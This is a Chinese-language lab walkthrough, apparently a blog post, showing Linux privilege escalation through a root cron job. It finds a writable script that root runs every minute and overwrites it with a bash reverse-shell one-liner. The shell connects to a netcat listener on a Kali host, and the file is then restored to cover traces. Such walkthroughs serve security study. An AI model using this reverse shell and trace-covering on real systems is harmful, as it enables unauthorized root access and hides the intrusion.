当前位置: 首页 > news >正文

Linux提权之计划任务反弹shell提权(十一)

实验环境还是一样的

当获取一个linux普通用户的时,查看计划任务

首先我们退出root用户

cat /etc/crontab

crontab -l

查看当前用户命令

/var/spool/cron/crontabs/root

这个目录是root任务文件 默认是不是root权限是 看不到

tail -f /var/log/syslog

咋们切换用户web1

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

然后复制一份文件 到tmp目录 用于修改回来

cp /script/cleanup.py /tmp/cleanup.py

然后我们修改

/script/cleanup.py

这个.py文件

bash -i >& /dev/tcp/192.168.25.138/6666 0>&1

然后在kail新建窗口 开启监听

nc -lvnp 6666

等待计划任务执行

现在返回shell

root

提权成功

然后我们消除痕迹 我们把原来的文件修改回来 就好了

相关文章:

  • 【Viewer.js】vue3封装图片查看器
  • 【时时三省】(C语言基础)结构化程序设计方法
  • 二:前端发送POST请求,后端获取数据
  • Java并发 ThreadLocal 原理(详解)
  • c++中,什么时候应该使用mutable关键字?
  • Bash Shell控制台终端命令合集
  • C语言番外篇(3)------------>break、continue
  • 论文笔记:Autonomy-of-Experts Model
  • watchEffect 里有响应式依赖时并没有自动追踪
  • C++关键字之mutable
  • Tesseract OCR:起源、发展与完整使用指南
  • 多线程篇学习面试
  • 请谈谈 Vue 中的 key 属性的重要性,如何确保列表项的唯一标识?
  • 设计模式Python版 中介者模式
  • Vue 3 + Vite 项目中配置代理解决开发环境中跨域请求问题
  • Linux系统管理与编程01:准备工作
  • vim 多个关键字高亮插件介绍
  • A. Jagged Swaps
  • mybatis从接口直接跳到xml的插件
  • 不同activity的mViewModel是复用同一个的还是每个activity都是创建新的ViewModel
  • 法国宣布投资1亿欧元吸引外国科研人员
  • 特朗普要征100%关税,好莱坞这批境外摄制新片有麻烦了
  • 张家口一景区观光魔毯疑失控致游客被甩出,涉事景区改造升级重新开园才3天
  • 三百余英国王室藏品,一览爱德华时代的优雅
  • AI世界的年轻人|研究不止于实验室,更服务于遥远山区
  • 五一假期前三日多景区客流刷新纪录,演艺、古镇、山水都很火